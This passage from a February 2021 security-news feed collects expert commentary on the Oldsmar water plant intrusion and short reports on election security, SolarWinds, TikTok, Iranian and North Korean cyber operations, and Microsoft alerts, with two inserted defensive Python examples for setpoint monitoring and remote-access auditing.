“Since last year, Mandiant Threat Intelligence has observed an increase in cyber incidents perpetrated by low sophisticated actors seeking to access and learn about remotely accessible industrial systems. Many of the victims appear to have been selected arbitrarily, such as small critical infrastructure asset owners and operators who serve a limited population set. Through remote interaction with these systems, actors have engaged in limited-impact operations that often included manipulation of variables from physical processes. None of these cases has resulted in damage to people or infrastructure given that industrial processes are often designed and monitored by professional engineers who incorporate safety mechanisms to prevent unexpected modifications. We believe that the increasing interest of low sophisticated actors in industrial control systems is the result of the increased availability of tools and resources that allow malicious actors to learn about and interact with these systems.
While the incident does not appear to be particularly complex, it highlights the need to strengthen the cybersecurity capabilities across the water and wastewater industry similarly to other critical infrastructure sectors.”
Joe Slowik, Senior Security Researcher, Domain Tools:
“[The Stuxnet, Triton, Industroyer and the 2015 Ukraine power grid attacks emphasized] a critical barrier to adversary success: the ability to evade, influence, or outright deny operator visibility into and control over ICS environments. In all four examples, the attacks required some mechanism to hide from operators or deny their ability to correct or mitigate changes made to operating parameters.
In the case of the Oldsmar treatment plant incident, the intruder failed to attempt any such action based on information currently available. Had the unknown entity spoofed or otherwise interfered with HMI display parameters or sensor data, the operator on duty would be less likely to notice the incident as it took place, resulting in an attack moving on to engineering and process controls for potential mitigation or detection. Not only did the intruder fail to limit or manipulate process view in the environment, they executed the event during primary working hours on a weekday, almost ensuring that such activity would be quickly noticed (and mitigated).
Based on these observations and in light of past ICS incidents, we can therefore make a reasonably confident claim with available evidence that this was not an especially complex or savvy “attack”. As described in multiple sources, the intruder appears to have merely taken advantage of weakly secured, accessible remote access mechanisms to connect to plant equipment controls, followed by either deliberate or potentially inadvertent manipulation of the environment. That such an attempt occurred at all is certainly concerning, but the overwhelming evidence given event timing and execution indicate that there were only slight possibilities for this event to produce significant damage or harm.”
Ron Brash, Director of Cyber Security Insights, Verve Industrial:
“This will be a very interesting trial for any individuals caught, but it’s likely those who were managing this facility were struggling too and/or potentially negligent as they may have been aware that additional cybersecurity was needed given the importance of this infrastructure. I suspect insurance due diligence would have been problematic had a disaster occurred; it might even be revoked now…
This was not the first attack on water or utilities, and luckily there was a human in the loop to prevent disaster. The warning bell should be sounded, but CISOs (or those in charge) are lucky because they are in a very defensible position. In fact, I believe this is a call for organizations to double down on the cybersecurity basics, assess their asset & infrastructure, and validate controls on their “crown” jewels. There are effective and feasible strategies out there to help municipalities get control of an out-of-control situation that will slowly gain speed.
Whether the government should step in and help, or by what means, is debatable. Municipalities need help, but they also need ongoing support & commitment – not a one-time grant that probably will be without a follow up.
Digitalization of water and utilities presents a problem we are seeing more and more often. New connected systems are being added, and this magnifies/multiplies the risks that may not have been applicable before. Security always degrades, and remote connectivity or any new technology.”
Grant Geyer, Chief Product Officer, Claroty:
“Water and wastewater is one of the most at-risk critical infrastructure sectors today. Industrial control system (ICS) vulnerability disclosures impacting the sector have increased significantly year-over-year. As noted in our Biannual ICS Risk & Vulnerability Report released a few days ago, the Claroty Research Team found that ICS vulnerabilities disclosed during the second half (2H) of 2020 increased by 54% from 2H 2019 and 63% from 2H 2018 in water and wastewater.
Due to the long depreciation period of equipment in critical infrastructure environments, technology obsolescence and the accompanying security vulnerabilities are a common occurrence. Additionally, many water utilities are small entities and are under-resourced, making the challenge of developing a robust security program that much more challenging.
The solution is not as simple as eliminating remote access to such high-stakes environments. The nature of our increasingly digitized world, especially with the shift to remote work caused by the pandemic, makes remote access a requirement – even in critical infrastructure. This isn’t a “should we or shouldn’t we” discussion – it’s coming at us. The key is how remote access can be implemented securely, so that we can stop these attacks – which will inevitably continue to happen – before the damage is done.”
Andrea Carcano, Co-Founder, Nozomi Networks:
“Based on the information available at this moment, this attack seems to lack any sophistication that could trigger more profound reactions. The fact that the perpetrator didn’t conceal his visual presence to the personnel monitoring the water treatment operation is the first signal that suggests the relatively low complexity of the attack. Furthermore, according to the reports of the incident, the attacker increased the levels of sodium hydroxide by a significant amount, typically monitored by automated systems, which likely suggests that the threat actor didn’t possess specific background knowledge of the water treatment process.
Nevertheless, this incident is important because it reflects the status of too many industrial control system (ICS) installations, especially those with smaller budgets and a smaller size, where security is often overlooked. Remote access, in particular, when not designed with security in mind, is often the beachhead used by remote attackers to infiltrate an ICS network. In this very case, the water treatment plant of Oldsmar has been using a TeamViewer instance, which apparently was accessible from the Internet. While it is not known at this stage how the attackers obtained the credentials required, this incident, like many that we’ve documented in recent years, didn’t seem to rely on a sophisticated zero-day exploit for its execution.”
Chris Grove, Technology Evangelist, Nozomi Networks:
“As evidenced in this cyber attack, typical cyber security activities may not have mitigated this risk, including vulnerability management, network segmentation, system hardening, identity and access management, firewalling, etc. In many cases, and especially during this pandemic, remote administration solutions have been thrown into the mix, sometimes haphazardly. In some cases the due diligence and compensating security controls haven’t been recognized. In other cases it has. Either way, facilities should stop thinking like they will prevent cyber attacks and start thinking like they’re already happening. They may not see it, so they should be in a constant state of recovery.
That said, concepts such as zero trust start making sense. Once the operator realizes that nothing is to be trusted, they move towards monitoring the process itself, and the parameters being sent from all of the devices in the control room to the equipment. If the water facility in Oldsmar had this level of cyber security, alarms would have gone off the moment the values were set to anomalous numbers.
[...]
Unfortunately most of today’s facilities are only protected a little bit by wide monitoring which doesn’t go deep into the industrial control protocols themselves. Any facility where human lives are at risk, particularly so many, should monitor the industrial control process using artificial intelligence and anomaly detection to monitor, alert and stop anomalies within the process that aren’t a part of regular operations. By doing so, the facility would mitigate many risks including malicious or negligent insiders that may accidentally type a few digits too many, as well as external attackers looking to pull off an act of terrorism.”
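A process-level monitor of the kind Grove describes, as an added example that is not code from Nozomi Networks or from the original article: every setpoint write reaching the process is checked against engineering limits, a maximum step change, and whether it came from the local HMI. The tag names, limits, source labels and the setpoint-change log below are constructed for illustration.

```python
"""Rule-based monitoring of HMI setpoint writes.

Added example, not from the original article. Tag names, engineering
limits, source labels and the setpoint-change log are constructed.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import List

# Constructed engineering limits per process tag: (low, high) in the tag's unit.
# A write outside this band can never be a legitimate operator action.
LIMITS = {
    "NAOH_DOSE_PPM": (50.0, 200.0),      # sodium hydroxide dose setpoint (assumed band)
    "CL2_RESIDUAL_MGL": (0.5, 4.0),      # free chlorine residual target (assumed band)
}

# Largest step change, relative to the previous value, accepted without
# review. Bigger jumps are flagged even when the new value is inside the band.
MAX_RELATIVE_STEP = 0.5


@dataclass
class SetpointWrite:
    ts: datetime
    tag: str
    old: float
    new: float
    source: str          # constructed labels: "HMI-LOCAL" or "REMOTE-SESSION"


@dataclass
class Alert:
    ts: datetime
    tag: str
    reason: str
    new: float


def check_write(w: SetpointWrite) -> List[Alert]:
    """Return the alerts one setpoint write should raise (empty if none)."""
    alerts = []
    low, high = LIMITS.get(w.tag, (float("-inf"), float("inf")))
    if not low <= w.new <= high:
        alerts.append(Alert(w.ts, w.tag, f"outside engineering limits [{low}, {high}]", w.new))
    if w.old > 0 and abs(w.new - w.old) / w.old > MAX_RELATIVE_STEP:
        alerts.append(Alert(w.ts, w.tag, f"step change >{MAX_RELATIVE_STEP:.0%} of previous value", w.new))
    if w.source != "HMI-LOCAL":
        alerts.append(Alert(w.ts, w.tag, f"write from non-local source {w.source}", w.new))
    return alerts


def monitor(writes: List[SetpointWrite]) -> List[Alert]:
    """Run every write through the rules and collect all alerts."""
    return [a for w in writes for a in check_write(w)]


# Constructed sample log: two routine operator adjustments and one remote
# write that pushes the caustic dose far outside its band.
SAMPLE_WRITES = [
    SetpointWrite(datetime(2021, 2, 5, 8, 2), "NAOH_DOSE_PPM", 100.0, 110.0, "HMI-LOCAL"),
    SetpointWrite(datetime(2021, 2, 5, 9, 15), "CL2_RESIDUAL_MGL", 2.0, 2.2, "HMI-LOCAL"),
    SetpointWrite(datetime(2021, 2, 5, 13, 30), "NAOH_DOSE_PPM", 110.0, 11000.0, "REMOTE-SESSION"),
]

if __name__ == "__main__":
    for a in monitor(SAMPLE_WRITES):
        print(f"{a.ts:%Y-%m-%d %H:%M} {a.tag} -> {a.new}: {a.reason}")
```

The three rules are deliberately independent: the limits rule would fire even if the attacker had spoofed the HMI display, the step rule catches a fat-fingered extra digit by a legitimate operator, and the source rule gives the operator a reason to look even when the value itself is plausible.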
Austin Berglas, former head of FBI NY Cyber and Global Head of Professional Services at BlueVoyant:
“Along with energy production and manufacturing, water supply facilities are part of the United States’ critical infrastructure and have long been targets for cyber attack from both criminal and state sponsored entities. Water facilities rely on systems control and data acquisition (SCADA) systems to manage the automated process of water distribution and treatment. Many of these industrial control systems (ICS) are outdated, unpatched, and available for review on the Internet, leaving them incredibly vulnerable to compromise. In addition, many ICS solutions were designed for non-internet facing environments and therefore did not incorporate certain basic security controls - this offers additional vulnerabilities as more and more operational technology environments are allowing access to their ICS systems from the Internet.
In 2013, the FBI investigated a compromise of the Bowman Avenue Dam in Rye Brook NY and found that members of the Iranian Revolutionary Guard had gained access through Internet-facing controls. Although the Dam was not functioning at the time and was most likely not the Iranians’ main target, it demonstrates the vulnerability of certain critical infrastructure when their ICS systems are allowed to be exposed to the Internet and not isolated.”
Saryu Nayyar, CEO, Gurucul:
“The cyberattack against the water supply in Oldsmar, Florida, last week should come as a wakeup call. Cybersecurity professionals have been talking about infrastructure vulnerabilities for years, detailing the potential for attacks like this, and this is a near perfect example of what we have been warning about. Though this attack was not successful, there is little doubt a skilled attacker could execute a similar infrastructure attack with more destructive results. Organizations tasked with operating and protecting critical public infrastructure must assume the worst and take more serious measures to protect their environments.”
Chloé Messdaghi, VP of Strategy, Point3 Security:
“The thing we need to understand is that you don’t have to be a highly skilled attacker to be able to successfully breach a system like this. Although alarms would’ve been triggered before any dangerous water reached anyone’s taps, this plant was very lucky that the worker noticed his mouse moving and was able to address it quickly. Water plants are not known for their security resources, and between budget cuts and COVID keeping people working remotely, they’re even more vulnerable. It’s becoming easier and easier for people who have hardly any experience at all to access systems like these.
The area this happened in has a high population of children, and it’s disturbing to think someone would attempt to do harm like this.”
Karl Sigler, Senior Security Research Manager, SpiderLabs at Trustwave:
"All systems used for critical networks like these should have very limited, if any, Internet access. User accounts and credentials used to authenticate locally on the workstation and for TeamViewer should be changed frequently and utilise multi-factor authentication. In this instance, it was lucky that the user was physically there to see the remote control and what settings had changed, but all critical activities should be audited, logged and monitored for abuse."
Report Highlights Cyber Risks to US Election Systems
13.2.2021 BigBrothers Securityweek
Election systems in the U.S. are vulnerable to cyber intrusions similar to the one that hit federal agencies and numerous businesses last year and remain a potential target for foreign hacking, according to a report released Wednesday.
The report by the Center for Internet Security, a nonprofit that partners with the federal government on election security initiatives, focuses on how hardware and software components can provide potential entryways for hackers.
“We have to continue to get better,” said Aaron Wilson, a co-author of the report. “We have to improve our defenses, as those that are on the other side are likely honing their attack strategy, as well.”
The 2020 election was deemed the “most secure” in history by a coalition of government cybersecurity experts and state and local election officials. There also is no indication that any election system was compromised as part of the hacking campaign that exploited an update of network management software from a company called SolarWinds. It was the largest cybersecurity breach of federal systems in U.S. history.
Despite that, election systems are vulnerable to the same risks exposed by the SolarWinds hack, the report said. It describes the risk of such an attack, in which hackers might infiltrate the hardware or software used in election equipment. Even if voting results aren’t affected, such an attack could lead to confusion and undermine confidence in U.S. elections.
The nation’s decentralized system of election administration means voting technology varies from state to state and even county to county, providing multiple ways for malicious actors to gain access. The systems generally rely on components from third-party suppliers or use commercial, off-the-shelf hardware. Most also use proprietary software that may not be subjected to rigorous security testing.
“It’s a complex mix of parts and suppliers, which creates very real supply chain risks,” said Eddie Perez, global director of technology development at the OSET Institute, a nonprofit election technology research corporation.
The use of foreign suppliers for voting technology and related supply chain security has long been a concern. During a congressional hearing last year, executives with the three major voting machine vendors faced repeated questioning from lawmakers about the sources of the parts used to manufacture their voting machines, what steps they have taken to secure their products from tampering and what, if anything, can be done to use American-made parts.
The executives said the machines they manufacture include, to some extent, components from China but said using foreign suppliers isn’t unique to the voting equipment industry.
SolarWinds, a Texas company, was breached by suspected Russian hackers to deliver malware and gain access to networks of businesses and governments, including the U.S. departments of Commerce, Treasury and Justice as part of a large-scale cyberespionage campaign.
Brandon Wales, the acting director of the U.S. Cybersecurity and Infrastructure Security Agency, said recently there was “no evidence that any election systems were compromised” as part of the hack.
Election officials have spent years working to boost their cybersecurity defenses after it became clear in late 2017 that Russian hackers had scanned state and local voter registration systems in the run-up to the 2016 election — and penetrated a few. Tens of millions of dollars have been spent to educate and train state and local election officials, add security defenses such as firewalls, and conduct security reviews and testing.
Also Wednesday, the U.S. Election Assistance Commission approved the first update in 15 years to a series of voluntary guidelines used by most states to certify voting machines. The guidelines include several security improvements, including a recommendation for states to adopt a strategy to reduce supply chain risks.
Biden Team Asks Court to Pause Move to Ban TikTok in US
11.2.2021 BigBrothers Securityweek
President Joe Biden's administration has asked a US federal court to pause proceedings aimed at banning TikTok to allow for a fresh review of the national security threat from the popular Chinese-owned video app.
The filing in a federal appeals court said the new administration had begun a review and would not for the moment press for a ban of the mobile app as sought by former president Donald Trump.
The filing said the Commerce Department "plans to conduct an evaluation of the underlying record justifying those prohibitions" sought by the previous administration of Donald Trump, which claimed TikTok posed a national security threat because of its links to the Chinese government.
After the new review, the administration "will then be better positioned to determine whether the national security threat" from TikTok.
"The Department of Commerce remains committed to a robust defense of national security as well as ensuring the viability of our economy and preserving individual rights and data privacy," the filing said.
The Trump administration move to ban downloads of TikTok and its presence on online networks had been stalled amid legal challenges.
In a related development, the Wall Street Journal reported the Biden administration has also put on hold a plan to force the sale of TikTok to American investors.
The Journal, citing unnamed sources, said the Biden White House had indefinitely shelved the plan to require the sale of TikTok, owned by China's ByteDance, to US tech giant Oracle with Walmart as a partner.
The Journal said the new administration is in the midst of a review of data security and ways to prevent the information TikTok collects on American users from being accessed by the Chinese government, but that there would be no imminent move to force the sale.
The White House did not directly address the report, but spokeswoman Jen Psaki said: "It's not accurate to suggest that there is a new proactive step by the Biden White House."
Psaki added that there is a "rigorous" review of data security of TikTok by an interagency government panel, with no timetable set.
"I will note broadly speaking that we are comprehensively evaluating the risks... to US data including from TikTok and will address them in a decisive and effective fashion," she said.
TikTok, the wildly popular app with an estimated 100 million US users, has repeatedly defended itself against allegations of data transfers to the Chinese government, saying it stores user information on servers in the United States and Singapore.
A tentative deal unveiled by the Trump administration would make Silicon Valley giant Oracle the technology partner for TikTok and a stakeholder in a new entity to be known as TikTok Global.
White House Names SolarWinds Response Leader Amid Criticism
11.2.2021 BigBrothers Securityweek
After members of Congress criticized as “disorganized” the U.S. response to a massive breach of government departments and private corporations discovered late last year, the White House announced Wednesday that a senior national security official had been leading the effort since the first day of the Biden administration.
Anne Neuberger, the deputy national security adviser for cyber and emergency technology, was in charge of remediating the hack, identifying issues with the federal government’s response and launching a study aimed at preventing similar incidents, the White House said.
Intelligence and law enforcement officials are still trying to piece together the cyberespionage campaign blamed on Russia that has badly shaken the U.S. government and private sector. The hack, connected to tainted software from the U.S. firm SolarWinds, was publicly revealed in December but believed to have begun more than a year earlier.
The intruders stealthily scooped up intelligence for months, carefully choosing targets from thousands of customers infected with malicious code they activated after sneaking it into an update of network management software first pushed out last March by Texas-based SolarWinds. The company makes popular software that monitors computer networks of businesses and governments.
So far, the list of agencies known to have been affected includes the Treasury, Commerce and Justice departments, along with several private companies including cybersecurity firms. The Russian government has denied any role in the hack.
In a letter released Tuesday, leaders of the Senate Intelligence Committee blasted the Biden administration for what they said was a lackluster reaction to the SolarWinds hack.
“The briefings we have received convey a disjointed and disorganized response to confronting the breach,” Sens. Mark Warner, D-Va., and Marco Rubio, R-Fla., said in the letter.
Warner, the new Democratic chairman of the committee, and Rubio, the Republican vice chairman, urged the Biden administration to “name and empower a clear leader” who has the authority to “coordinate the response, set priorities, and direct resources to where they are needed.”
The White House response on Wednesday pointed to Neuberger’s role since Biden’s inauguration. The response to the letter was first reported by The New York Times.
“In the first weeks of the Biden administration DNSA Neuberger has held a series of consultations with both Democratic and Republican members of Congress on our approach to SolarWinds specifically and our cybersecurity strategy broadly,” said Emily Horne, a spokeswoman for the National Security Council. “We look forward to continuing to work with Congress on these issues.”
A joint statement from Warner and Rubio acknowledged the White House’s reassurance and suggested Neuberger’s role had not been known.
“The federal government’s response to date to the SolarWinds breach has lacked the leadership and coordination warranted by a significant cyber event, so it is welcome news that the Biden administration has selected Anne Neuberger to lead the response,” the statement said.
Also on Wednesday, the House Homeland Security Committee held a hearing with cybersecurity experts to discuss the SolarWinds hack and other issues.
“In the not too distant past ... most of us had never heard of SolarWinds, but now it dominates cybersecurity conversations,” said Rep. Bennie Thompson, D-Miss., the committee’s chairman.
Poor Password Security Led to Recent Water Treatment Facility Hack
11.2.2021 BigBrothers Thehackernews
New details have emerged about the remote computer intrusion at a Florida water treatment facility last Friday, highlighting a lack of adequate security measures needed to bulletproof critical infrastructure environments.
The breach involved an unsuccessful attempt on the part of an adversary to increase sodium hydroxide dosage in the water supply to dangerous levels by remotely accessing the SCADA system at the water treatment plant. The system's plant operator, who spotted the intrusion, quickly took steps to reverse the command, leading to minimal impact.
Now, according to an advisory published on Wednesday by the state of Massachusetts, unidentified cyber actors accessed the supervisory control and data acquisition (SCADA) system via TeamViewer software installed on one of the plant's several computers that were connected to the control system.
Not only were these computers running 32-bit versions of the Windows 7 operating system, but the machines also shared the same password for remote access and are said to have been exposed directly to the Internet without any firewall protection installed.
It's worth noting that Microsoft Windows 7 reached end-of-life as of last year, on January 14, 2020.
Adding to the woes, more often than not, many small public utilities are saddled with aging infrastructure, and the IT departments tend to be under-resourced, lacking in budget and expertise to upgrade their security posture and address vulnerabilities in a timely fashion.
"Restrict all remote connections to SCADA systems, specifically those that allow physical control and manipulation of devices within the SCADA network," Massachusetts state officials said. "One-way unidirectional monitoring devices are recommended to monitor SCADA systems remotely."
"Keep computers, devices, and applications, including SCADA/industrial control systems (ICS) software, patched and up-to-date," the alert cautioned, adding "use two-factor authentication with strong passwords."
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in a separate alert published today, warned of "cybercriminals targeting and exploiting desktop sharing software and computer networks running operating systems with end of life status to gain unauthorized access to systems."
The agency, besides recommending protective measures such as installing independent cyber-physical safety systems, also issued additional guidance when using TeamViewer, urging organizations to configure the service to "manual start" and refrain from using unattended access features.
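The remote-access findings and recommendations above (shared passwords, end-of-life Windows 7, direct Internet exposure without a firewall, TeamViewer not set to manual start, unattended access, missing two-factor authentication) read as an audit checklist. The script below, an added example that is not code from the Massachusetts advisory or from CISA, runs that checklist over a constructed asset inventory; the record fields, host names and credential fingerprints are assumptions made for illustration, and only the Windows 7 end-of-life date comes from the article.

```python
"""Audit a constructed asset inventory against the remote-access
recommendations quoted in the article.

Added example, not code from either agency. Inventory records, field
names and host names are assumptions; the Windows 7 end-of-life date is
the one the article states.
"""
from datetime import date
from typing import Dict, List

# Operating systems past vendor support. Only the Windows 7 entry is from
# the article; add others from the vendor's own lifecycle tables.
EOL_OS = {
    "Windows 7": date(2020, 1, 14),
}

# Date the audit is run against (constructed, around the incident's date).
AUDIT_DATE = date(2021, 2, 10)

# Constructed inventory: one record per workstation on the control network.
# "remote_pw_hash" stands in for whatever credential fingerprint the audit
# can compare without ever handling plaintext passwords.
INVENTORY = [
    {"host": "ws-scada-01", "os": "Windows 7", "internet_exposed": True,
     "host_firewall": False, "remote_tool": "TeamViewer",
     "remote_tool_autostart": True, "unattended_access": True,
     "mfa": False, "remote_pw_hash": "h1"},
    {"host": "ws-scada-02", "os": "Windows 7", "internet_exposed": True,
     "host_firewall": False, "remote_tool": "TeamViewer",
     "remote_tool_autostart": True, "unattended_access": True,
     "mfa": False, "remote_pw_hash": "h1"},
    {"host": "ws-eng-01", "os": "Windows 10", "internet_exposed": False,
     "host_firewall": True, "remote_tool": "TeamViewer",
     "remote_tool_autostart": False, "unattended_access": False,
     "mfa": True, "remote_pw_hash": "h2"},
]


def audit_host(rec: Dict, today: date) -> List[str]:
    """Findings for one host; an empty list means it passes every check."""
    findings = []
    eol = EOL_OS.get(rec["os"])
    if eol and today >= eol:
        findings.append(f"OS {rec['os']} unsupported since {eol.isoformat()}")
    if rec["internet_exposed"] and not rec["host_firewall"]:
        findings.append("control-network host reachable from the Internet with no firewall")
    if rec["remote_tool"]:
        if rec["remote_tool_autostart"]:
            findings.append(f"{rec['remote_tool']} starts automatically; set it to manual start")
        if rec["unattended_access"]:
            findings.append(f"{rec['remote_tool']} unattended access enabled")
        if not rec["mfa"]:
            findings.append("remote access without multi-factor authentication")
    return findings


def shared_credentials(inventory: List[Dict]) -> Dict[str, List[str]]:
    """Map each credential fingerprint used by more than one host to those hosts."""
    by_hash: Dict[str, List[str]] = {}
    for rec in inventory:
        by_hash.setdefault(rec["remote_pw_hash"], []).append(rec["host"])
    return {h: hosts for h, hosts in by_hash.items() if len(hosts) > 1}


def audit(inventory: List[Dict], today: date) -> Dict[str, List[str]]:
    """Per-host findings plus a synthetic '_shared_credentials' entry for the fleet."""
    report = {rec["host"]: audit_host(rec, today) for rec in inventory}
    report["_shared_credentials"] = [
        f"hosts {', '.join(hosts)} share one remote-access credential"
        for hosts in shared_credentials(inventory).values()
    ]
    return report


if __name__ == "__main__":
    for host, findings in audit(INVENTORY, AUDIT_DATE).items():
        for f in findings:
            print(f"{host}: {f}")
```

Shared credentials are a fleet-wide property rather than a per-host one, which is why they are collected in a separate pass: a host that looks fine on its own still fails if its password also opens a neighbour.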
Iranian Hackers Utilize ScreenConnect to Spy On UAE, Kuwait Government Agencies
11.2.2021 BigBrothers Thehackernews
UAE and Kuwait government agencies are targets of a new cyberespionage campaign potentially carried out by Iranian threat actors, according to new research.
Attributing the operation to be the work of Static Kitten (aka MERCURY or MuddyWater), Anomali said the "objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise in 2015) with unique launch parameters that have custom properties," with malware samples and URLs masquerading as the Ministry of Foreign Affairs (MOFA) of Kuwait and the UAE National Council.
Since its origins in 2017, MuddyWater has been tied to a number of attacks primarily against Middle Eastern nations, actively exploiting the Zerologon vulnerability in real-world attack campaigns to strike prominent Israeli organizations with malicious payloads.
The state-sponsored hacking group is believed to be working at the behest of Iran's Islamic Republic Guard Corps, the country's primary intelligence and military service.
Anomali said it spotted two separate lure ZIP files hosted on Onehub that claimed to contain a report on relations between Arab countries and Israel or a file relating to scholarships.
"The URLs distributed through these phishing emails direct recipients to the intended file storage location on Onehub, a legitimate service known to be used by Static Kitten for nefarious purposes," the researchers noted, adding "Static Kitten is continuing to use Onehub to host a file containing ScreenConnect."
The attack commences by directing users to a downloader URL pointing to these ZIP files via a phishing email that, when opened, launches the installation process for ScreenConnect, and subsequently uses it to communicate with the adversary. The URLs themselves are distributed through decoy documents embedded in the emails.
ConnectWise Control (formerly called ScreenConnect) is a self-hosted remote desktop software application with support for unattended access and conducting meetings with screen-sharing features.
The ultimate goal of the attackers, it appears, is to use the software to connect to endpoints on client networks, enabling them to conduct further lateral movements and execute arbitrary commands in target environments in a bid to facilitate data theft.
"Utilizing legitimate software for malicious purposes can be an effective way for threat actors to obfuscate their operations," the researchers concluded. "In this latest example, Static Kitten is very likely using features of ScreenConnect to steal sensitive information or download malware for additional cyber operations."
Old Iranian Spying Operation Resumes After Long Break
10.2.2021 BigBrothers Securityweek
Following a two-year downtime, an Iran-linked cyberespionage operation has recommenced with new second-stage malware and with an updated variant of the Infy malware, according to joint research conducted by cybersecurity firms SafeBreach and Check Point.
Evidence suggests the operation started as early as 2007 -- it was one of the earliest Iranian campaigns discovered -- but it was initially detailed in 2016, while the next year it also involved the use of a piece of malware called Foudre, which by 2018 had already been updated eight times.
Following a quiet period, the operation recommenced during the first half of 2020, with new versions of Foudre (versions 20-22) and new lure documents that were designed to execute the malicious code when closed. Once executed, Foudre connects to the command and control (C&C) server and fetches a new piece of malware, called Tonnerre.
The new malware, security researchers say, appears to have been designed to expand the capabilities of Foudre, but released as a separate component, most probably to be deployed only when needed.
Tonnerre, which camouflages itself as legitimate software, can steal files from the infected machines, can execute commands received from the C&C server, record sound, and capture screenshots.
The malware uses a DGA to connect to the C&C, which it then uses to store data about the victim, steal files, download updates, and get an additional C&C. Tonnerre uses both HTTP and FTP to communicate with the C&C server.
While investigating the operation, SafeBreach and Check Point identified two dozen victims, most located in Sweden (6), the Netherlands (4), Turkey (3), and the United States (3). Romania, Russia, India, Iraq, the United Kingdom, Germany, Canada, and Azerbaijan had one victim each, but Iran had none.
“It seems that following a long downtime, the Iranian cyber attackers were able to regroup, fix previous issues and dramatically reinforce their OPSEC activities as well as the technical proficiency and tooling capabilities,” reads a blog post that contains extensive technical details on both Foudre and Tonnerre.
Check Point last week reported that more than 1,200 Iranian citizens had been targeted in extensive cyber-surveillance operations backed by the Iranian government.
UN Experts: North Korea Using Cyber Attacks to Update Nukes
10.2.2021 BigBrothers Securityweek
North Korea has modernized its nuclear weapons and ballistic missiles by flaunting United Nations sanctions, using cyberattacks to help finance its programs and continuing to seek material and technology overseas for its arsenal, U.N. experts said.
The panel of experts monitoring sanctions on the Northeast Asian nation said in a report sent to Security Council members Monday that North Korea’s “total theft of virtual assets from 2019 to November 2020 is valued at approximately $316.4 million,” according to one unidentified country.
The panel said its investigations found that North Korean-linked cyber actors continued to conduct operations in 2020 against financial institutions and virtual currency exchange houses to generate money to support its weapons of mass destruction and ballistic missile programs.
In its weapons development, the experts said, Kim Jong Un’s government has also produced fissile material — an essential ingredient for producing nuclear weapons — and maintained its nuclear facilities.
“It displayed new short-range, medium-range, submarine-launched and intercontinental ballistic missile systems at military parades,” they said. “It announced preparation for testing and production of new ballistic missile warheads and, development of tactical nuclear weapons ... and upgraded its ballistic missile infrastructure.”
The panel recommended that the Security Council impose sanctions on four North Korean men: Choe Song Chol, Im Song Sun, Pak Hwa Song, and Hwang Kil Su.
The Security Council has imposed increasingly tough sanctions on North Korea since its first test explosion of a nuclear device in 2006. It has banned most of the country’s exports and severely limited its imports, trying to pressure Pyongyang into abandoning its nuclear and ballistic missile programs.
But the report’s summary and some key findings and recommendations, obtained by The Associated Press, make clear that North Korea remains able to evade sanctions and develop its weapons and to illicitly import refined petroleum, access international banking channels and carry out “malicious cyber activities.”
North Korea’s arsenal escalated to a major threat to the United States following tests in 2017 that included a detonation of a purported thermonuclear warhead and flight tests demonstrating its ICBMs could reach deep in the American mainland.
A year later, Kim initiated diplomacy with South Korea and then-U.S. President Donald Trump that derailed in 2019 when the Americans rejected North Korea’s demands for major sanctions relief in exchange for a piecemeal deal partially surrendering its nuclear weapons capabilities.
Last year, North Korea’s already battered economy decayed further amid the COVID-19 pandemic, which led Kim to close the country’s borders. That severely limited the legal and illegal transfer of goods and movement of people, according to the experts.
At a North Korean political conference, Kim sharply criticized his government’s economic agencies for unspecified passiveness and “self-protecting tendencies,” the North’s state media reported Tuesday. His remarks follow a ruling party congress last month where he called for greater state control over the economy while also vowing to continue all-out efforts to boost his nuclear program, which North Korea sees as a deterrent to the U.S. and thus an assurance of the Kim dynasty’s continued existence.
With his diplomatic efforts stalemated, Kim must start all over again with President Joe Biden, who previously called him a “thug” and criticized Trump for summit spectacles instead of significant nuclear reductions.
In August 2019, the U.N. panel said North Korean cyber experts illegally obtained proceeds “estimated at up to $2 billion” to fund its weapons programs.
The panel said in the new report that it investigated “malicious” activities by the Reconnaissance General Bureau — North Korea’s primary intelligence agency, which is on the U.N. sanctions blacklist — including “the targeting of virtual assets and virtual asset service providers, and attacks on defense companies.”
North Korea continues to launder stolen cryptocurrencies, especially through over-the-counter virtual asset brokers in China, to acquire fiat currency, which is government-backed, like the U.S. dollar, the experts said.
The panel said it is investigating a September 2020 hack against a cryptocurrency exchange that resulted in approximately $281 million worth of cryptocurrencies being stolen, and transactions on the blockchain indicating the $281 million hack is related to a $23 million second hack in October 2020.
“Preliminary analysis, based on the attack vectors and subsequent efforts to launder the illicit proceeds strongly suggests links to the DPRK,” the experts said, using the initials of the country’s official name, the Democratic People’s Republic of Korea.
According to one unnamed country, North Korea also continues to generate illegal revenue by exploiting freelance information technology platforms using the same methods it does to access the global financial system -- false identification, use of virtual private network services, and establishing front companies in Hong Kong, the panel said.
The experts said they investigated attempted violations of the U.N. arms embargo, including illegal actions of blacklisted companies. They cited the Korea Mining Development Trading Corporation, alleged military cooperation by North Korea, and the use of the country’s overseas diplomatic missions for commercial purposes.
The panel said it also investigated “the country’s continued illicit import of refined petroleum, via direct deliveries and ship-to-ship transfers, using elaborate subterfuge.”
It cited images, data and calculations from an unidentified country showing that between Jan. 1 and Sept. 30 last year North Korea received shipments of refined petroleum products exceeding “by several times” the annual ceiling of 500,000 barrels set by the Security Council.
U.N. sanctions ban North Korean coal exports, and the panel said shipments of coal appear to have been largely suspended since late July 2020.
It said that last year, North Korea continued to transfer fishing rights in violation of sanctions, which earned the country $120 million in 2018, according to an unnamed member state.
Under a 2017 sanctions resolution, all North Korean nationals working overseas were to be repatriated by Dec. 22, 2019. The experts said they investigated North Korean workers earning income in sub-Saharan Africa as well as information technology workers dispatched by the Munitions Industry Department.
Microsoft to notify Office 365 users of nation-state attacks
9.2.2021 BigBrothers Securityaffairs
Microsoft implements alerts for ‘nation-state activity’ in the Defender for Office 365 dashboard, to allow organizations to quickly respond.
Microsoft has been alerting users of nation-state activity since 2016; the IT giant has now added the same service to the Defender for Office 365 dashboard.
The new security alert will notify companies when their employees are being targeted by state-sponsored attacks.
Since this Saturday, the new alert service was added to the Microsoft 365 roadmap website.
“Nation state threats are defined as cyber threat activity that originates in a particular country with the apparent intent of furthering national interests. These attacks represent some of the most advanced and persistent threat activity Microsoft tracks.” reads the announcement published by Microsoft. “The Microsoft Threat Intelligence Center follows these threats, builds comprehensive profiles of the activity, and works closely with all Microsoft security teams to implement detections and mitigations to protect our customers. We’re adding an alert to the security portal to alert customers when suspected nation-state activity is detected in the tenant.”
